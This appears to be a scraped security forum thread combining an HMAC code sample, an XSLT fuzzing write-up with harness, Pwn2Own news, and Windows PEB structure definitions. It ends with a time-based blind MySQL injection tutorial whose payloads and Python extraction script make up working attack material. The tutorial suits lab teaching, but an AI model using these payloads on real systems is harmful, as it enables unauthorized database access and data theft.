    cout << "Hash HMAC-MD5: " << hash_md5 << " ( " << strlen(hash_md5) << " )" << endl;
    cin.get();
    return 0;
}

char * HMAC(char * str, char * password, DWORD AlgId)
{
    HCRYPTPROV hProv = 0;
    HCRYPTKEY hKey = 0;
    HCRYPTHASH hHmacHash = 0;
    BYTE * pbHash = 0;
    DWORD dwDataLen = 0;
    HMAC_INFO HmacInfo;
    int err = 0;

    ZeroMemory(&HmacInfo, sizeof(HmacInfo));
    if (AlgId == CALG_MD5) {
        HmacInfo.HashAlgid = CALG_MD5;
        dwDataLen = 16;                       // MD5 digest: 16 bytes
    } else if (AlgId == CALG_SHA1) {
        HmacInfo.HashAlgid = CALG_SHA1;
        dwDataLen = 20;                       // SHA-1 digest: 20 bytes
    } else {
        return 0;
    }
    pbHash = new BYTE[dwDataLen];
    ZeroMemory(pbHash, dwDataLen);
    char * res = new char[dwDataLen * 2 + 1]; // two hex chars per byte, plus NUL

    // Wrap the password in a PLAINTEXTKEYBLOB so it can be imported as an HMAC key
    DWORD kbSize = sizeof(my_blob) + strlen(password);
    my_blob * kb = (my_blob*)malloc(kbSize);
    kb->header.bType = PLAINTEXTKEYBLOB;
    kb->header.bVersion = CUR_BLOB_VERSION;
    kb->header.reserved = 0;
    kb->header.aiKeyAlg = CALG_RC2;
    memcpy(&kb->key, password, strlen(password));
    kb->len = strlen(password);

    if (!CryptAcquireContext(&hProv, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT | CRYPT_NEWKEYSET)) { err = 1; goto Exit; }
    if (!CryptImportKey(hProv, (BYTE*)kb, kbSize, 0, CRYPT_IPSEC_HMAC_KEY, &hKey)) { err = 1; goto Exit; }
    if (!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHmacHash)) { err = 1; goto Exit; }
    if (!CryptSetHashParam(hHmacHash, HP_HMAC_INFO, (BYTE*)&HmacInfo, 0)) { err = 1; goto Exit; }
    if (!CryptHashData(hHmacHash, (BYTE*)str, strlen(str), 0)) { err = 1; goto Exit; }
    if (!CryptGetHashParam(hHmacHash, HP_HASHVAL, pbHash, &dwDataLen, 0)) { err = 1; goto Exit; }

    // Hex-encode the digest; %02x zero-pads each byte, so no space-fixing pass is needed
    ZeroMemory(res, dwDataLen * 2 + 1);
    for (unsigned int m = 0; m < dwDataLen; m++) {
        sprintf(res + m * 2, "%02x", pbHash[m]);
    }

Exit:
    free(kb);
    if (hHmacHash) CryptDestroyHash(hHmacHash);
    if (hKey) CryptDestroyKey(hKey);
    if (hProv) CryptReleaseContext(hProv, 0);
    delete [] pbHash;
    if (err == 1) {
        delete [] res;
        return "";
    }
    return res;
}

// Note: using HMAC-MD5 you could perform the famous CRAM-MD5 scheme used to
// authenticate to SMTP servers.

Source: HMAC MD5/SHA1 - rohitab.com - Forums
  18. [h=2]Monday, 25 February 2013, 17:26:37 (UTC+0100)[/h]
[h=3]Mutation-based fuzzing of XSLT engines[/h]
Intro
In 2011 I did some research on vulnerabilities caused by the abuse of dangerous features provided by XSLT engines. This led to a few vulnerabilities (mainly access to the file system or code execution) in Webkit, xmlsec, SharePoint, Liferay, MoinMoin, PostgreSQL, ... In 2012, I decided to look for memory corruption bugs and did some mutation-based (aka "dumb") fuzzing of XSLT engines. This article presents more than 10 different PoCs affecting Firefox, Adobe Reader, Chrome, Internet Explorer and Intel SOA. Most of these bugs have been patched by their respective vendors. The goal of this blog post is mainly to show XML newbies what pathological XSLT looks like. Of course, exploit writers could find some useful information too.

When fuzzing XSLT engines by providing malformed XSLT stylesheets, (at least) three distinct components are tested:
- the XML parser itself, as an XSLT stylesheet is an XML document
- the XSLT interpreter, which needs to compile and execute the provided code
- the XPath engine, because attributes like "match" and "select" use it to reference data

Given that dumb fuzzing is used, the generation of test cases is quite simple: Radamsa generates packs of 100 stylesheets from a pool of 7000 grabbed here and there. A much improved version (using, among other things, grammar-based generation) is on the way and already gives promising results ;-) PoCs were minimized manually, given that the template structure and execution flow of XSLT don't work well with minimizers like tmin or delta.

Intel SOA Expressway XSLT 2.0 Processor
Intel offered an evaluation version of their XSLT 2.0 engine. It's quite rare to encounter a C-based XSLT engine supporting version 2.0, so it was added to the testbed even if it has minor real-world relevance. In my opinion, the first bug should have been detected during functional testing: when idiv (available in XPath 2.0) is used with 1 as the denominator, an optimization/shortcut is taken, but it seems that someone confused the address and the value of the corresponding numerator variable. Note that the value of the numerator corresponds to 0x41424344 in hex.

Article: http://www.agarri.fr/blog/index.html
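For readers who want to reproduce the setup, here is a minimal harness sketch in Python (the XSLT processor command and file layout are placeholders, not the author's actual tooling; radamsa's documented -n/-o options generate N mutants from the sample pool):

import glob, os, shutil, subprocess

os.makedirs("cases", exist_ok=True)
os.makedirs("crashes", exist_ok=True)

pool = glob.glob("pool/*.xsl")  # the grabbed stylesheet corpus
subprocess.run(["radamsa", "-n", "100", "-o", "cases/%n.xsl"] + pool, check=True)

for case in sorted(glob.glob("cases/*.xsl")):
    try:
        proc = subprocess.run(["xslt-engine-under-test", case, "input.xml"],  # placeholder target
                              capture_output=True, timeout=10)
    except subprocess.TimeoutExpired:
        continue  # hangs are interesting too, but handle them separately
    if proc.returncode < 0:  # terminated by a signal on POSIX: likely a crash
        shutil.copy(case, "crashes/")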
  19. A few ideas: https://docs.google.com/file/d/0B46UFFNOX3K7bl8zWmFvRGVlamM/view?pli=1&sle=true
  20. It's crap. Do Linux, Android, iOS, Mac OS X, Firefox OS or Chrome OS make you select a browser? Maybe I want Internet Explorer on Linux, under Wine; I want to be asked to choose!
  21. Not worth the money, nothing special...
  22. Given how complicated these things are, the money is proportionate. But how the companies cooperate also matters. VUPEN's CEO (the sharpest people in exploit development, in my opinion) stated that Microsoft no longer wants to buy their 0-days (the IE10-on-Win8 one), so they will end up with governments instead. Which is not OK at all.
  23. [h=1]Major Browsers, Java Hacked on the First Day of Pwn2Own 2013[/h]
March 7th, 2013, 14:04 GMT · By Eduard Kovacs

Considering the large amounts of money being offered at Pwn2Own 2013, we shouldn't be surprised that most of the web browsers have been hacked on the first day of the competition, held these days in Canada as part of the CanSecWest conference. So far, Firefox, Internet Explorer 10, Java and Chrome have been broken by the contestants.

French security firm VUPEN announced breaking Internet Explorer 10 on Windows 8, Firefox 19 on Windows 7, and Java. "We've pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass," VUPEN wrote on Twitter. "We've pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP," the company said two hours later. It appears they hacked Java by leveraging a "unique heap overflow as a memory leak to bypass ASLR and as a code execution." "ALL our 0days & techniques used at #Pwn2own have been reported to affected software vendors to allow them issue patches and protect users," VUPEN said.

Experts from MWR Labs have managed to demonstrate a full sandbox bypass exploit against the latest stable version of Chrome. "By visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process," MWR Labs representatives wrote. "We also used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges."

Java was also "pwned" by Josh Drake of Accuvant Labs and James Forshaw of Contextis. Currently, VUPEN is working on breaking Flash, Pham Toan is attempting to hack Internet Explorer 10, and the famous George Hotz is taking a crack at Adobe Reader.

Source: Major Browsers, Java Hacked on the First Day of Pwn2Own 2013 - Softpedia
  24. [h=2]Evolution of Process Environment Block (PEB)[/h]
March 2, 2013 / ReWolf

Over a year ago I published a unified definition of the PEB for x86 and x64 Windows (PEB32 and PEB64 in one definition). It was based on the PEB taken from Windows 7 NTDLL symbols, but I was pretty confident that it should work on other versions of Windows as well. Recently someone left a comment under the mentioned post: "Good, but is it only for Windows 7?". It made me curious whether it is really 'only for Win7'. I was expecting that there might be some small differences between some field names, or maybe some new fields added at the end, but the overall structure should be the same. I had no other choice but to check it myself.

I collected 108 different ntdll.pdb/wntdll.pdb files from various versions of Windows and dumped the _PEB structure from them (Dia2Dump ftw!). Here are some statistics:
- _PEB was defined in 80 different PDBs (53 x86 PEBs and 27 x64 PEBs)
- There were 11 unique PEBs for x86 and 8 unique PEBs for x64 (those numbers don't add up, as starting from Windows 2003 SP1 there is always a match between the x86 and x64 versions)
- The total number of collected different _PEB definitions is 11

I've put all the collected information into a nice table (click the picture to open the PDF): PEB Evolution PDF

The left column of the table represents the x86 offset and the right column the x64 offset. Green fields are supposed to be compatible across all Windows versions, starting from XP without any SP and ending at Windows 8 RTM; red (pink? rose?) fields should be used only after carefully verifying that they work on the target system. At the top of the table there is a row called NTDLL TimeStamp: it is not the timestamp from the PE header but the one from the Debug Directory (IMAGE_DIRECTORY_ENTRY_DEBUG; LordPE can parse this structure). I'm using this timestamp as a unique identifier for the NTDLL version; it is also stored in the PDB files.

Now I can answer the initial question: "Is my previous PEB32/PEB64 definition wrong?" Yes and no. Yes, because it contains various fields specific to Windows 7, so it can be considered wrong. No, because most fields are exactly the same across all Windows versions, especially those fields that are usually used in third-party software.
To satisfy everyone, I've prepared another version of the PEB32/PEB64 definition:

#pragma pack(push)
#pragma pack(1)

template <class T>
struct LIST_ENTRY_T {
    T Flink;
    T Blink;
};

template <class T>
struct UNICODE_STRING_T {
    union {
        struct {
            WORD Length;
            WORD MaximumLength;
        };
        T dummy;
    };
    T _Buffer;
};

template <class T, class NGF, int A>
struct _PEB_T {
    union {
        struct {
            BYTE InheritedAddressSpace;
            BYTE ReadImageFileExecOptions;
            BYTE BeingDebugged;
            BYTE _SYSTEM_DEPENDENT_01;
        };
        T dummy01;
    };
    T Mutant;
    T ImageBaseAddress;
    T Ldr;
    T ProcessParameters;
    T SubSystemData;
    T ProcessHeap;
    T FastPebLock;
    T _SYSTEM_DEPENDENT_02;
    T _SYSTEM_DEPENDENT_03;
    T _SYSTEM_DEPENDENT_04;
    union {
        T KernelCallbackTable;
        T UserSharedInfoPtr;
    };
    DWORD SystemReserved;
    DWORD _SYSTEM_DEPENDENT_05;
    T _SYSTEM_DEPENDENT_06;
    T TlsExpansionCounter;
    T TlsBitmap;
    DWORD TlsBitmapBits[2];
    T ReadOnlySharedMemoryBase;
    T _SYSTEM_DEPENDENT_07;
    T ReadOnlyStaticServerData;
    T AnsiCodePageData;
    T OemCodePageData;
    T UnicodeCaseTableData;
    DWORD NumberOfProcessors;
    union {
        DWORD NtGlobalFlag;
        NGF dummy02;
    };
    LARGE_INTEGER CriticalSectionTimeout;
    T HeapSegmentReserve;
    T HeapSegmentCommit;
    T HeapDeCommitTotalFreeThreshold;
    T HeapDeCommitFreeBlockThreshold;
    DWORD NumberOfHeaps;
    DWORD MaximumNumberOfHeaps;
    T ProcessHeaps;
    T GdiSharedHandleTable;
    T ProcessStarterHelper;
    T GdiDCAttributeList;
    T LoaderLock;
    DWORD OSMajorVersion;
    DWORD OSMinorVersion;
    WORD OSBuildNumber;
    WORD OSCSDVersion;
    DWORD OSPlatformId;
    DWORD ImageSubsystem;
    DWORD ImageSubsystemMajorVersion;
    T ImageSubsystemMinorVersion;
    union {
        T ImageProcessAffinityMask;
        T ActiveProcessAffinityMask;
    };
    T GdiHandleBuffer[A];
    T PostProcessInitRoutine;
    T TlsExpansionBitmap;
    DWORD TlsExpansionBitmapBits[32];
    T SessionId;
    ULARGE_INTEGER AppCompatFlags;
    ULARGE_INTEGER AppCompatFlagsUser;
    T pShimData;
    T AppCompatInfo;
    UNICODE_STRING_T<T> CSDVersion;
    T ActivationContextData;
    T ProcessAssemblyStorageMap;
    T SystemDefaultActivationContextData;
    T SystemAssemblyStorageMap;
    T MinimumStackCommit;
};

typedef _PEB_T<DWORD, DWORD64, 34> PEB32;
typedef _PEB_T<DWORD64, DWORD, 30> PEB64;

#pragma pack(pop)

The above version is system independent, as all fields that change across OS versions are marked _SYSTEM_DEPENDENT_xx. I've also removed from the end all fields that were added after Windows XP.

Source: Evolution of Process Environment Block (PEB)
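As a quick way to sanity-check one of the "green" fields from the table, here is a small Python ctypes sketch (Windows only; my addition, not part of the original post) that asks NtQueryInformationProcess for the current process's PEB base address and reads BeingDebugged at offset +2, which the table shows is stable on every version:

import ctypes
from ctypes import wintypes

ntdll = ctypes.WinDLL("ntdll")
kernel32 = ctypes.WinDLL("kernel32")
kernel32.GetCurrentProcess.restype = wintypes.HANDLE
ntdll.NtQueryInformationProcess.argtypes = [wintypes.HANDLE, ctypes.c_int,
                                            ctypes.c_void_p, ctypes.c_ulong,
                                            ctypes.c_void_p]

class PROCESS_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("Reserved1", ctypes.c_void_p),
                ("PebBaseAddress", ctypes.c_void_p),
                ("Reserved2", ctypes.c_void_p * 2),
                ("UniqueProcessId", ctypes.c_void_p),
                ("Reserved3", ctypes.c_void_p)]

pbi = PROCESS_BASIC_INFORMATION()
ntdll.NtQueryInformationProcess(kernel32.GetCurrentProcess(), 0,  # ProcessBasicInformation
                                ctypes.byref(pbi), ctypes.sizeof(pbi), None)
# BeingDebugged sits at PEB+2 in both PEB32 and PEB64
print(ctypes.c_ubyte.from_address(pbi.PebBaseAddress + 2).value)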
  25. [h=3]MySQL Injection Time Based[/h]
We have already written a couple of posts on SQL injection techniques, such as "SQL Injection Union Based", "Blind SQL Injection" and, last but not least, "Common problems faced while performing SQL Injection". However, the series could not miss the time-based SQL injection technique. @yappare has come up with another excellent post, which explains how this attack can be used to perform a wide variety of attacks. Over to @yappare.

Hey everyone! It's another post by me, @yappare. As I promised Mr Rafay previously, here's a simple tutorial for RHA on the MySQL time-based technique. Before that, as usual, here are some good references for those interested in SQLi: Time-Based Blind SQL Injection with Heavy Queries, and of course the greatest cheatsheet, Cheat Sheets | pentestmonkey.

OK, back to our testing machine. In this example I'll use the OWASP WebApps vulnerable machine, tested on the Peruggia application. Let's go!

Previously, we already knew that the pic_id parameter is vulnerable to SQLi. So, let's say we want to use a time-based attack on this vulnerable parameter; here's what we are going to do. But first, note that for time-based SQLi in MySQL we use the SLEEP() function. Each DBMS has a different function for this, but the steps are usually quite similar:
- In MSSQL we use WAITFOR DELAY
- In POSTGRES we use PG_SLEEP()
- and so on; do check the pentestmonkey cheatsheet

Back to our testing. Let's check whether a time-based attack can be performed on the parameter. Test it using this command:
pic_id=13 and sleep(5)--

As we can see from the image above, there's a difference between the requests. The first is a normal request, where the response time is 0 seconds, while in the second request I include the SLEEP() command, so the server waits 5 seconds before responding. From here we know that it can be attacked via the time-based technique as well.

Let's proceed to check the current user. Here's the command that we are going to use:
pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--

From the query: if the current user's first character is equal to 'a', the server will sleep for 5 seconds before responding. If not, the server will respond in its normal response time. Then you proceed to test other characters. From the image above, we can clearly see that for the first and second requests the server responded in 0 seconds, while the third request was delayed for 5 seconds. Why? Because the first character of the current user is 'p', not 'a' or 'h'.

Then you can proceed to check the second character and so on:
pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--
pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--

So go on with table_name guessing:
pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

The first request is FALSE, because the server responded in 0 seconds: no table named 'user' exists. In the second request the server was delayed for 5 seconds, so a table named 'users' does exist!

How about guessing the column_name? It's easy:
pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

See the image above? Still need any explanation? I bet you already understand it! Time for data-extraction mode!
pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--

So, if the first character of the data in the right column_name of the right table_name is 'a', the server will be delayed for 5 seconds. Then proceed to test the second, third character and so on. The image shows that the username is 'admin'. Is it correct? Let's double-check it. Yeah, it's correct.

That's all for now! Thanks, @yappare
Source: MySQL Injection Time Based | Learn How To Hack - Ethical Hacking and security tips
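To close the tutorial out, here is a small Python sketch of how the guessing loop above can be automated (the URL, request parameters and alphabet are placeholders, not the exact Peruggia endpoint): each guess is timed, and the character whose request stalls for the SLEEP interval is the right one:

import string, time
import requests

URL = "http://victim/peruggia/index.php"  # hypothetical location of the vulnerable app
DELAY = 5
ALPHABET = string.ascii_lowercase + string.digits + "_@."  # avoids quote characters

def char_at(expr, pos):
    # a true condition sleeps for DELAY seconds; the round-trip time tells them apart
    for c in ALPHABET:
        payload = f"13 and if(substring(({expr}),{pos},1)='{c}',sleep({DELAY}),1)-- -"
        t0 = time.time()
        requests.get(URL, params={"action": "comment", "pic_id": payload})
        if time.time() - t0 >= DELAY:
            return c
    return None

result = ""
for pos in range(1, 33):  # extract the current user one character per round
    c = char_at("select user()", pos)
    if c is None:
        break
    result += c
print(result)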